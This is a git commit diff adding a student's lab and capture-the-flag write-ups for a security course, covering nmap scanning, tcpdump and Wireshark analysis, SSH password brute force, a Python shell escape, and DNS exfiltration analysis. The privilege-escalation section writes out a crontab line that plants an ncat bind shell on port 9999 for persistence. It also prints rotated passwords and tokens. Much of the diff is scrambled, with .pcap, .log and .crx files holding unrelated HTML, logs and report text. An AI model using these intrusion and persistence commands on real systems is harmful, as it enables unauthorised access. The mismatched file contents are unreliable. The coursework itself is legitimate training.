add BSY

Author: matoous

BSY/02.md

@@ -1,177 +1,11 @@
-# Lecture 02
+## 2. Finding Computers to Attack and Services.
 
+In this task we had to scan local network for open ports and find a machine we could attack.
+First device with open ports was router on 192.168.1.0 witch had admin web server.
+We tried bruteforcing the password and username on the router but that didn't seem to work.
+Finally we decided to try and scan elsewhere as the router probably wasn't meant to be targeted.
 
-Logged into the machine
-
-```
-ssh class@147.32.82.209 -p 445
-```
-
-And run tcpdump to capture the network traffic in following days in order to analyze
-it later
-
-```
-nohup sudo tcpdump -n -s0 -i enp0s3 sudo tcpdump -n -s0 -i enp0s3 -v -w capture-%Y-%m-%d--%H:%M.pcap -G 86400 &
-```
-
-Scan local network (Eduroam) with
-
-```
-> nmap -sP -n -v 147.32.218.166/24
-```
-
-```
-> nmap -sP -PU -n -v <your-ip>/24 --send-ip
-
-Warning: The -sP option is deprecated. Please use -sn
-Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-17 15:31 CEST
-Initiating Ping Scan at 15:31
-Scanning 255 hosts [1 port/host]
-sendto in send_ip_packet_sd: sendto(4, packet, 28, 0, 147.32.218.0, 16) => No route to host
-Offending packet: UDP 147.32.218.166:46834 > 147.32.218.0:40125 ttl=40 id=12993 iplen=7168
-Completed Ping Scan at 15:32, 12.61s elapsed (255 total hosts)
-Nmap scan report for 147.32.218.0 [host down]
-Nmap scan report for 147.32.218.1 [host down]
-Nmap scan report for 147.32.218.2
-Host is up (0.079s latency).
-MAC Address: 24:46:C8:0F:E4:82 (Unknown)
-Nmap scan report for 147.32.218.3
-Host is up (0.080s latency).
-MAC Address: 64:A6:51:C8:75:63 (Huawei Technologies)
-Nmap scan report for 147.32.218.4
-Host is up (0.14s latency).
-MAC Address: 88:BD:45:9E:D6:53 (Samsung Electronics)
-Nmap scan report for 147.32.218.5 [host down]
-Nmap scan report for 147.32.218.6 [host down]
-Nmap scan report for 147.32.218.7
-Host is up (0.12s latency).
-MAC Address: DC:A4:CA:E0:F8:E2 (Apple)
-Nmap scan report for 147.32.218.8
-Host is up (0.15s latency).
-MAC Address: D4:38:9C:3E:90:EC (Sony Mobile Communications)
-Nmap scan report for 147.32.218.9
-Host is up (0.074s latency).
-MAC Address: AC:92:32:EF:AB:F3 (Huawei Technologies)
-Nmap scan report for 147.32.218.10
-Host is up (0.033s latency).
-MAC Address: 60:F8:1D:C7:37:82 (Apple)
-Nmap scan report for 147.32.218.11
-Host is up (0.046s latency).
-Host is up (0.19s latency).
-MAC Address: 94:0E:6B:0A:98:E1 (Huawei Technologies)
-Nmap scan report for 147.32.218.23
-Host is up (0.071s latency).
-MAC Address: 3C:15:C2:E8:0D:38 (Apple)
-Nmap scan report for 147.32.218.24
-Host is up (0.31s latency).
-MAC Address: 94:65:2D:C3:07:7C (OnePlus Technology (Shenzhen))
-Nmap scan report for 147.32.218.25 [host down]
-Nmap scan report for 147.32.218.26
-Host is up (1.2s latency).
-MAC Address: 18:65:90:21:05:24 (Apple)
-Nmap scan report for 147.32.218.27 [host down]
-Nmap scan report for 147.32.218.28 [host down]
-Nmap scan report for 147.32.218.29
-Host is up (0.0054s latency).
-MAC Address: E4:A4:71:AD:DF:04 (Intel Corporate)
-Nmap scan report for 147.32.218.75
-Host is up (0.12s latency).
-MAC Address: 8C:25:05:AB:48:3B (Huawei Technologies)
-Nmap scan report for 147.32.218.76
-Host is up (0.34s latency).
-MAC Address: 04:1B:6D:C4:8F:17 (LG Electronics (Mobile Communications))
-Nmap scan report for 147.32.218.77 [host down]
-Nmap scan report for 147.32.218.78
-Host is up (0.069s latency).
-Nmap scan report for 147.32.218.254 [host down]
-Nmap scan report for 147.32.218.255 [host down]
-Nmap scan report for 147.32.218.166
-Host is up.
-Read data files from: /usr/local/bin/../share/nmap
-Nmap done: 256 IP addresses (134 hosts up) scanned in 12.67 seconds
-Raw packets sent: 388 (10.864KB) | Rcvd: 177 (11.408KB)
-```
-
-Scan all open things on requested networks:
-
-```
-sudo nmap -sSU -v 153.127.232.1-20
-Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-17 15:43 CEST
-Initiating Ping Scan at 15:43
-Scanning 20 hosts [4 ports/host]
-Completed Ping Scan at 15:43, 2.34s elapsed (20 total hosts)
-Initiating Parallel DNS resolution of 20 hosts. at 15:43
-Completed Parallel DNS resolution of 20 hosts. at 15:43, 0.28s elapsed
-Nmap scan report for 153.127.232.4 [host down]
-Nmap scan report for 153.127.232.9 [host down]
-Nmap scan report for 153.127.232.10 [host down]
-Nmap scan report for 153.127.232.11 [host down]
-Nmap scan report for 153.127.232.13 [host down]
-Nmap scan report for 153.127.232.14 [host down]
-Nmap scan report for 153.127.232.15 [host down]
-Nmap scan report for 153.127.232.20 [host down]
-Initiating SYN Stealth Scan at 15:43
-Scanning 12 hosts [1000 ports/host]
-Discovered open port 21/tcp on 153.127.232.12
-Discovered open port 21/tcp on 153.127.232.16
-Discovered open port 22/tcp on 153.127.232.19
-Discovered open port 22/tcp on 153.127.232.12
-Discovered open port 22/tcp on 153.127.232.18
-Discovered open port 22/tcp on 153.127.232.17
-Discovered open port 21/tcp on 153.127.232.18
-Discovered open port 21/tcp on 153.127.232.17
-Discovered open port 21/tcp on 153.127.232.19
-Discovered open port 22/tcp on 153.127.232.16
-Discovered open port 3306/tcp on 153.127.232.17
-Discovered open port 3306/tcp on 153.127.232.19
-Discovered open port 443/tcp on 153.127.232.17
-Discovered open port 3306/tcp on 153.127.232.18
-Discovered open port 443/tcp on 153.127.232.19
-Discovered open port 3306/tcp on 153.127.232.16
-Discovered open port 443/tcp on 153.127.232.12
-Discovered open port 3306/tcp on 153.127.232.12
-Discovered open port 443/tcp on 153.127.232.16
-Discovered open port 443/tcp on 153.127.232.18
-Discovered open port 111/tcp on 153.127.232.16
-Discovered open port 111/tcp on 153.127.232.17
-Discovered open port 111/tcp on 153.127.232.18
-Discovered open port 25/tcp on 153.127.232.19
-Discovered open port 25/tcp on 153.127.232.12
-Discovered open port 80/tcp on 153.127.232.16
-Discovered open port 25/tcp on 153.127.232.17
-Discovered open port 80/tcp on 153.127.232.18
-Discovered open port 25/tcp on 153.127.232.16
-Discovered open port 80/tcp on 153.127.232.19
-Discovered open port 25/tcp on 153.127.232.18
-Discovered open port 80/tcp on 153.127.232.12
-Discovered open port 80/tcp on 153.127.232.17
-Discovered open port 513/tcp on 153.127.232.16
-Discovered open port 873/tcp on 153.127.232.16
-Discovered open port 513/tcp on 153.127.232.19
-Discovered open port 513/tcp on 153.127.232.12
-Discovered open port 513/tcp on 153.127.232.18
-Discovered open port 513/tcp on 153.127.232.17
-Discovered open port 873/tcp on 153.127.232.19
-Discovered open port 873/tcp on 153.127.232.12
-SYN Stealth Scan Timing: About 30.43% done; ETC: 15:45 (0:01:11 remaining)
-Discovered open port 873/tcp on 153.127.232.18
-Discovered open port 873/tcp on 153.127.232.17
-Discovered open port 514/tcp on 153.127.232.16
-Discovered open port 514/tcp on 153.127.232.19
-Discovered open port 514/tcp on 153.127.232.12
-Discovered open port 514/tcp on 153.127.232.18
-Discovered open port 514/tcp on 153.127.232.17
-Discovered open port 2049/tcp on 153.127.232.16
-SYN Stealth Scan Timing: About 52.68% done; ETC: 15:45 (0:00:55 remaining)
-Discovered open port 2049/tcp on 153.127.232.12
-Discovered open port 2049/tcp on 153.127.232.19
-Discovered open port 2049/tcp on 153.127.232.18
-Discovered open port 2049/tcp on 153.127.232.17
-Discovered open port 8088/tcp on 153.127.232.16
-```
-
-## Solution to homework
-
+### Solution
 
 After few runs finally this nmap command brought up some servers (excluding router) with non-22 ports open:
 

BSY/03.md

@@ -1 +1,46 @@
-# Detecting intruders using tcpdump and wireshark
+## 3. Detecting intruders using tcpdump and wireshark
+
+This task was meant for us to strengten our skills with wireshark and tcpdump.
+
+### Solution
+
+We captured traffic using tcpdump for over 3 hours using:
+
+```
+nohup tcpdump -n -s0 -i eth0 -A port ! 22 &
+```
+
+Then we twiggled around with filtering to find out something interesting.
+First we filtered out ssh traffic using
+
+```
+not ssh
+```
+
+Then we filtered the packets to keep only those for which we are the destination:
+
+```
+not ssh and ip.dst == 192.168.1.171
+```
+
+We saw a lot of port scans and other stuff happening so we filtered it out
+to see only non-empty packets
+
+```
+not ssh and ip.dst == 192.168.1.171 and (udp.length > 0 or tcp.len > 0)
+```
+
+we also removed ICMP packets
+
+```
+not ssh and ip.dst == 192.168.1.171 and (udp.length > 0 or tcp.len > 0) and not icmp
+```
+
+This left us with 186 packets, after a quick visual scan we saw that some contain wierd
+messages with "BEEP"s.
+
+Finally, the whole BEEPING stream contained message encoded in morse code, e.g.
+short BEEP standing for '.' and long BEEEPS standing for '-'. Decoded morse code
+message contained token that needed to be written to the flag server (`192.168.1.167`) in order to obtain
+the flag.
+

BSY/04.md

@@ -1,4 +1,4 @@
-# 6: Privilege Escalation and Persistence
+## 6: Privilege Escalation and Persistence
 
 The task is simple: Get SSH access to moriarty@192.168.1.193 and find flag.
 We are given a hint: Despite being a criminal mastermind, 
@@ -55,3 +55,5 @@ get killed by the script.
 After looking into the /vat/tmp/tokens folder we find token and flag server for first part
 of the task as well. We try to submit both flags but flag for token for the part B doesn't
 work which we later get to know was unintentional.
+
+

BSY/07.md BSY/06.md

@@ -0,0 +1,87 @@
+## 9. Data exfiltration techniques and their detection
+
+In this goal our task is to detect and analyze exfiltration in pcap files.
+
+### 9.a
+
+Upon visually inspecting the pcap we see that there are some long DNS TXT record queries.
+We filtered those out using 'dns.txt' filter. Then we went to the flag server mentioned
+in task description on `192.168.1.167:8991`.
+
+The server prompted as with several questions:
+
+```
+What was the domain used for exfiltration? (input the last part of the subdomain and the TLD, e.g. google.com)
+```
+
+The answer to this can be found by simply viewing the TXT queries. The domain ends
+with securitytesting.online and that is the answer.
+
+```
+<Legolas> Which type of DNS record was used?
+```
+
+As mentioned before the queries were of TXT type.
+
+```
+<Legolas> How many queries were used for the exfiltration in total?
+```
+
+The number of filtered out txt queries from INIT to last packet is 61.
+
+After that we received our flag:
+
+```
+<Legolas> Your friends are with you: BSY-FLAG-A09A-{...}
+```
+
+### 9.b
+
+In this task we see pcap of dns data exfiltration again. This time we know which tool
+was used [DNSExfiltrator](https://github.com/Arno0x/DNSExfiltrator) and we have the
+information that password 'pass' was used.
+
+We again filtered the packets using `dns.txt` and copied out both packets that were
+used for exfiltration:
+
+```
+init.ORSXG5BOOR4HI7BR.base64.securitytesting.online: type TXT, class IN
+```
+
+and
+
+```
+Name: 0.EIu3wCinsPK_RDCVv5d-28e2TU-Ec1BHT83QblPN3mOo-L1-dXVkSPod7iTczcQ.tlULhh7p_QqO-k4FtUQ56nkbgIOkTNePAkkDmEWAggVL7hEcLJpKORiesVBGsol.AEJgjlMn2JczQo6KGqUAJ4GtnaXI3YZW7uEel8fq0kjjJvQfVhtbHHKyx9bEhJO.zxhc39atS4.securitytesting.online
+```
+
+We cloned the repository with DNSExfiltrator and modified the code a bit to decode our string with fix password
+without the need to run the whole process. After extracting the result zip file
+we get folder with one single file: test.txt with following content:
+
+```
+lalalala
+passwords: jkgjhqgfwgefjh
+```
+
+We then proceed to the flag server again, this time running on `192.168.1.167:8992`
+First question:
+
+```
+<Gimli> What is the name of the exfiltrated file?
+```
+
+we already know the answer, the extracted file is `test.txt`
+
+```
+<Gimli> What is the password inside the file?
+```
+
+Answer is in the file: `jkgjhqgfwgefjh`
+
+Answering these two questions was enough to get the flag:
+
+```
+<Gimli> Never thought I'd die fighting side by side with an Elf: BSY-FLAG-A09B-{...}
+```
+
+

BSY/09.md

@@ -0,0 +1,10 @@
+#separator \x09
+#set_separator	,
+#empty_field	(empty)
+#unset_field	-
+#path	dhcp
+#open	2019-12-23-23-43-55
+#fields	ts	uids	client_addr	server_addr	mac	host_name	client_fqdn	domain	requested_addr	assigned_addr	lease_time	client_message	server_message	msg_types	duration
+#types	time	set[string]	addr	addr	string	string	string	string	addr	addr	interval	string	string	vector[string]	interval
+7112.640852	C4r5oF1ywfwcWu4oog,C89jRV2ZrYsiRXeG0l	10.0.2.15	10.0.2.2	08:00:27:40:76:00	robert-PC	robert-PC	-	10.0.2.15	10.0.2.15	86400.000000	-	-	REQUEST,ACK	0.000238
+#close	2019-12-23-23-43-55

BSY/bonus/bonus_assignment_stage1.pcap

@@ -0,0 +1,6 @@
+<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
+<TITLE>302 Moved</TITLE></HEAD><BODY>
+<H1>302 Moved</H1>
+The document has moved
+<A HREF="http://r7---sn-vufvj1-2gbe.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx?cms_redirect=yes&amp;ip=109.81.208.198&amp;ipbits=0&amp;mm=28&amp;mn=sn-vufvj1-2gbe&amp;ms=nvh&amp;mt=1525240878&amp;mv=m&amp;pl=24&amp;shardbypass=yes">here</A>.
+</BODY></HTML>

BSY/bonus/bonus_assignment_stage1_2.pcap

@@ -0,0 +1,6 @@
+<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
+<TITLE>302 Moved</TITLE></HEAD><BODY>
+<H1>302 Moved</H1>
+The document has moved
+<A HREF="http://r7---sn-vufvj1-2gbe.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx?cms_redirect=yes&amp;ip=109.81.208.198&amp;ipbits=0&amp;mm=28&amp;mn=sn-vufvj1-2gbe&amp;ms=nvh&amp;mt=1525240939&amp;mv=m&amp;pl=24&amp;shardbypass=yes">here</A>.
+</BODY></HTML>

BSY/bonus/conn.log

@@ -0,0 +1,6 @@
+<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
+<TITLE>302 Moved</TITLE></HEAD><BODY>
+<H1>302 Moved</H1>
+The document has moved
+<A HREF="http://r7---sn-vufvj1-2gbe.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx?cms_redirect=yes&amp;ip=109.81.208.198&amp;ipbits=0&amp;mm=28&amp;mn=sn-vufvj1-2gbe&amp;ms=nvh&amp;mt=1525240878&amp;mv=m&amp;pl=24&amp;shardbypass=yes">here</A>.
+</BODY></HTML>

BSY/bonus/dhcp.log

@@ -0,0 +1,18 @@
+<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
+<TITLE>302 Moved</TITLE></HEAD><BODY>
+<H1>302 Moved</H1>
+The document has moved
+<A HREF="http://r7---sn-vufvj1-2gbe.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx?cms_redirect=yes&amp;ip=109.81.208.198&amp;ipbits=0&amp;mm=28&amp;mn=sn-vufvj1-2gbe&amp;ms=nvh&amp;mt=1525240878&amp;mv=m&amp;pl=24&amp;shardbypass=yes">here</A>.
+</BODY></HTML>
+<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
+<TITLE>302 Moved</TITLE></HEAD><BODY>
+<H1>302 Moved</H1>
+The document has moved
+<A HREF="http://r7---sn-vufvj1-2gbe.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx?cms_redirect=yes&amp;ip=109.81.208.198&amp;ipbits=0&amp;mm=28&amp;mn=sn-vufvj1-2gbe&amp;ms=nvh&amp;mt=1525240939&amp;mv=m&amp;pl=24&amp;shardbypass=yes">here</A>.
+</BODY></HTML>
+<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
+<TITLE>302 Moved</TITLE></HEAD><BODY>
+<H1>302 Moved</H1>
+The document has moved
+<A HREF="http://r7---sn-vufvj1-2gbe.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx?cms_redirect=yes&amp;ip=109.81.208.198&amp;ipbits=0&amp;mm=28&amp;mn=sn-vufvj1-2gbe&amp;ms=nvh&amp;mt=1525240878&amp;mv=m&amp;pl=24&amp;shardbypass=yes">here</A>.
+</BODY></HTML>

BSY/bonus/dns.log

@@ -0,0 +1,18 @@
+#separator \x09
+#set_separator	,
+#empty_field	(empty)
+#unset_field	-
+#path	http
+#open	2019-12-23-23-43-55
+#fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
+#types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
+7275.263226	CyENx5304PIRt6dAAa	10.0.2.15	49321	192.35.177.64	80	1	GET	apps.identrust.com	/roots/dstrootcax3.p7c	-	1.1	Microsoft-CryptoAPI/6.1	-	0	893	200	OK	-	-	(empty)	-	-	-	-	-	-	F9umJ932EwMSCylNgg	-	-
+7619.980493	CtkoZv13uhx1Ib7oU4	10.0.2.15	49383	216.58.206.14	80	1	HEAD	redirector.gvt1.com	/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx	-	1.1	Microsoft BITS/7.5	-	0	0	302	Found	-	-	(empty)	-	-	-	-	-	-	-	-	-
+7620.100075	CFJGvrxE7XeI6oxH8	10.0.2.15	49384	90.182.119.18	80	1	HEAD	r7---sn-vufvj1-2gbe.gvt1.com	/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx?cms_redirect=yes&ip=109.81.208.198&ipbits=0&mm=28&mn=sn-vufvj1-2gbe&ms=nvh&mt=1525240878&mv=m&pl=24&shardbypass=yes	-	1.1	Microsoft BITS/7.5	-	0	0	200	OK	-	-	(empty)	-	-	-	-	-	-	-	-	-
+7627.407013	CtkoZv13uhx1Ib7oU4	10.0.2.15	49383	216.58.206.14	80	2	GET	redirector.gvt1.com	/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx	-	1.1	Microsoft BITS/7.5	-	0	523	302	Found	-	-	(empty)	-	-	-	-	-	-	FOSaqu4rqTTG3CTDJk	-	text/html
+7627.434865	CFJGvrxE7XeI6oxH8	10.0.2.15	49384	90.182.119.18	80	2	GET	r7---sn-vufvj1-2gbe.gvt1.com	/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx?cms_redirect=yes&ip=109.81.208.198&ipbits=0&mm=28&mn=sn-vufvj1-2gbe&ms=nvh&mt=1525240878&mv=m&pl=24&shardbypass=yes	-	1.1	Microsoft BITS/7.5	-	0	5431	206	Partial Content	-	-	(empty)	-	-	-	-	-	-	FoirTF2M7ed5uzcUt7	-	application/chrome-ext
+7631.628806	CtkoZv13uhx1Ib7oU4	10.0.2.15	49383	216.58.206.14	80	3	GET	redirector.gvt1.com	/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx	-	1.1	Microsoft BITS/7.5	-	0	523	302	Found	-	-	(empty)	-	-	-	-	-	-	FOSaqu4rqTTG3CTDJk	-	text/html
+7631.657408	CFJGvrxE7XeI6oxH8	10.0.2.15	49384	90.182.119.18	80	3	GET	r7---sn-vufvj1-2gbe.gvt1.com	/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx?cms_redirect=yes&ip=109.81.208.198&ipbits=0&mm=28&mn=sn-vufvj1-2gbe&ms=nvh&mt=1525240878&mv=m&pl=24&shardbypass=yes	-	1.1	Microsoft BITS/7.5	-	0	10569	206	Partial Content	-	-	(empty)	-	-	-	-	-	-	-	-	-
+7633.760766	CtkoZv13uhx1Ib7oU4	10.0.2.15	49383	216.58.206.14	80	4	GET	redirector.gvt1.com	/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx	-	1.1	Microsoft BITS/7.5	-	0	523	302	Found	-	-	(empty)	-	-	-	-	-	-	FOSaqu4rqTTG3CTDJk	-	text/html
+7633.788894	CFJGvrxE7XeI6oxH8	10.0.2.15	49384	90.182.119.18	80	4	GET	r7---sn-vufvj1-2gbe.gvt1.com	/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNDMwQUFWRnZjR3pDbVdiZUhHcEZzX25kZw/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx?cms_redirect=yes&ip=109.81.208.198&ipbits=0&mm=28&mn=sn-vufvj1-2gbe&ms=nvh&mt=1525240939&mv=m&pl=24&shardbypass=yes	-	1.1	Microsoft BITS/7.5	-	0	10268	206	Partial Content	-	-	(empty)	-	-	-	-	-	-	FqPGNE3XQBiEQeC7xd	-	-
+#close	2019-12-23-23-43-55

BSY/bonus/extract/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc(1).crx

@@ -0,0 +1,17 @@
+
+Server `192.168.1.167:9292` communication:
+
+```
+<Grinch> Please provide your token
+***
+<Grinch> What type of malware is it? (Choose on from Banking Trojan, Ransomware, RAT, Adware, CryptoMiner)
+
+<Grinch> What is the periodicity of the communication in seconds? (Remove decimals, for example 122.7 becomes 122)
+
+<Grinch> What is the port used for the C&C communication?
+
+<Grinch> What is the DNS server IP address?
+
+You answered correctly 0 out of 4 questions.
+You have 13 remaining attempts.
+```

BSY/bonus/extract/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc(2).crx

@@ -0,0 +1,10 @@
+#separator \x09
+#set_separator	,
+#empty_field	(empty)
+#unset_field	-
+#path	packet_filter
+#open	2019-12-23-23-43-55
+#fields	ts	node	filter	init	success
+#types	time	string	string	bool	bool
+1577141035.061436	zeek	ip or not ip	T	T
+#close	2019-12-23-23-43-55

BSY/bonus/extract/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

@@ -0,0 +1,11 @@
+#separator \x09
+#set_separator	,
+#empty_field	(empty)
+#unset_field	-
+#path	weird
+#open	2019-12-23-23-43-55
+#fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	name	addl	notice	peer
+#types	time	string	addr	port	addr	port	string	string	bool	string
+10.181681	-	-	-	-	-	unknown_protocol	2	F	zeek
+7112.656757	-	-	-	-	-	unknown_protocol	2	F	zeek
+#close	2019-12-23-23-43-55

BSY/bonus/extract/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx%3fcms_redirect=yes&ip=109.81.208(1).198&ipbits=0&mm=28&mn=sn-vufvj1-2gbe&ms=nvh&mt=1525240878&mv=m&pl=24&shardbypass=yes

@@ -0,0 +1,222 @@
+# BSY Report
+
+This is report for 4 tasks from BSY by Matous Dzivjak.
+
+## 2. Finding Computers to Attack and Services.
+
+In this task we had to scan local network for open ports and find a machine we could attack.
+First device with open ports was router on 192.168.1.0 witch had admin web server.
+We tried bruteforcing the password and username on the router but that didn't seem to work.
+Finally we decided to try and scan elsewhere as the router probably wasn't meant to be targeted.
+
+### Solution
+
+After few runs finally this nmap command brought up some servers (excluding router) with non-22 ports open:
+
+```
+sudo nmap -sS -n -v 192.168.1.0/24 -p- -T5 --min-parallelism 200 --max-rtt-timeout 5 --max-retries 1 --max-scan-delay 0 --min-rate 1000
+```
+
+I noticed that if run without verbose flag nmap doesn't report on some ports which took a few hours from me.
+The server with non-22 ports was 192.168.1.167. Some of the open ports were 22911, 8752, 13079, 26711.
+Most of the returnes ASCII art, one of them also contained token `EuphoricMushroomsFeedAnywhere`, this token was then
+requested by service on port 26711. We connected to this service using ncat:
+
+```
+ncat 192.168.1.167 26711
+```
+
+And upon being prompted for the token all that was needed was send this token as request. Response was the flag.
+
+## 3. Detecting intruders using tcpdump and wireshark
+
+This task was meant for us to strengten our skills with wireshark and tcpdump.
+
+### Solution
+
+We captured traffic using tcpdump for over 3 hours using:
+
+```
+nohup tcpdump -n -s0 -i eth0 -A port ! 22 &
+```
+
+Then we twiggled around with filtering to find out something interesting.
+First we filtered out ssh traffic using
+
+```
+not ssh
+```
+
+Then we filtered the packets to keep only those for which we are the destination:
+
+```
+not ssh and ip.dst == 192.168.1.171
+```
+
+We saw a lot of port scans and other stuff happening so we filtered it out
+to see only non-empty packets
+
+```
+not ssh and ip.dst == 192.168.1.171 and (udp.length > 0 or tcp.len > 0)
+```
+
+we also removed ICMP packets
+
+```
+not ssh and ip.dst == 192.168.1.171 and (udp.length > 0 or tcp.len > 0) and not icmp
+```
+
+This left us with 186 packets, after a quick visual scan we saw that some contain wierd
+messages with "BEEP"s.
+
+Finally, the whole BEEPING stream contained message encoded in morse code, e.g.
+short BEEP standing for '.' and long BEEEPS standing for '-'. Decoded morse code
+message contained token that needed to be written to the flag server (`192.168.1.167`) in order to obtain
+the flag.
+
+## 6: Privilege Escalation and Persistence
+
+The task is simple: Get SSH access to moriarty@192.168.1.193 and find flag.
+We are given a hint: Despite being a criminal mastermind, 
+this person loves reading superhero comic books….. nerd!
+
+So first we tried to bruteforce the password for user moriarty using the list
+of 1000 most common passwords (https://raw.githubusercontent.com/DavidWittman/wpxmlrpcbrute/master/wordlists/1000-most-common-passwords.txt)
+and command:
+
+```
+sudo nmap -sS -sV -p 22 192.168.1.193 -v -n --script ssh-brute --script-args userdb=names.txt,passdb=1000-most-common-passwords.txt
+```
+
+This sadly failed and didn't find the correct password.
+So we tried to guess what the password might be and on the first try we get in;
+the password was 'batman'.
+
+After getting in we see, that we have only 2 command available, python and ls.
+Using python we are able to spawn a shell:
+
+```
+import os; print(os.system('/bin/bash'))
+```
+
+After that, we could roam freely all over the server.
+First thing we did was to have some persistence we added following line to crontab:
+
+```
+(crontab -l ; echo "@reboot sleep 200 && ncat -l 9999 -k -c /bin/bash")|crontab 2> /dev/null
+```
+
+Which will upon reboot spawn a shell acessible on port 9999.
+
+After that, we explore more of what we can do. After a few minutes we stumble upon
+folder assignment07 under /home/user which contains script for the 7th assignment.
+In file password_rotator.sh we find whole script for the assignment from which we draw following conclusions:
+
+1. The passwords that the user rotates are: "superman" "ironman" "batman" "4a7#mgannn2LDD90T#1fX#0Yx%m!kxrMSmUXd60xKwdM0S6u"
+
+2. The file with second token is: /var/tmp/tokens/second_token.txt and it's content
+changes to following values: "Hysterical" "Spaghetti" "Floss" "Apparently"
+which together give the token for second part of the assignment: HystericalSpaghettiFlossApparently
+This token is also in the first comment in the script
+```
+#TOKEN:HystericalSpaghettiFlossApparently
+```
+
+3. The flag server for second part of the assignment is 192.168.1.167:9453
+
+4. On password rotation all ssh session to moriarty are killed so we won't be able
+to persist our ssh connection but we can definitely spawn a remote shell which shouldn't
+get killed by the script.
+
+After looking into the /vat/tmp/tokens folder we find token and flag server for first part
+of the task as well. We try to submit both flags but flag for token for the part B doesn't
+work which we later get to know was unintentional.
+
+
+## 9. Data exfiltration techniques and their detection
+
+In this goal our task is to detect and analyze exfiltration in pcap files.
+
+### 9.a
+
+Upon visually inspecting the pcap we see that there are some long DNS TXT record queries.
+We filtered those out using 'dns.txt' filter. Then we went to the flag server mentioned
+in task description on `192.168.1.167:8991`.
+
+The server prompted as with several questions:
+
+```
+What was the domain used for exfiltration? (input the last part of the subdomain and the TLD, e.g. google.com)
+```
+
+The answer to this can be found by simply viewing the TXT queries. The domain ends
+with securitytesting.online and that is the answer.
+
+```
+<Legolas> Which type of DNS record was used?
+```
+
+As mentioned before the queries were of TXT type.
+
+```
+<Legolas> How many queries were used for the exfiltration in total?
+```
+
+The number of filtered out txt queries from INIT to last packet is 61.
+
+After that we received our flag:
+
+```
+<Legolas> Your friends are with you: BSY-FLAG-A09A-{...}
+```
+
+### 9.b
+
+In this task we see pcap of dns data exfiltration again. This time we know which tool
+was used [DNSExfiltrator](https://github.com/Arno0x/DNSExfiltrator) and we have the
+information that password 'pass' was used.
+
+We again filtered the packets using `dns.txt` and copied out both packets that were
+used for exfiltration:
+
+```
+init.ORSXG5BOOR4HI7BR.base64.securitytesting.online: type TXT, class IN
+```
+
+and
+
+```
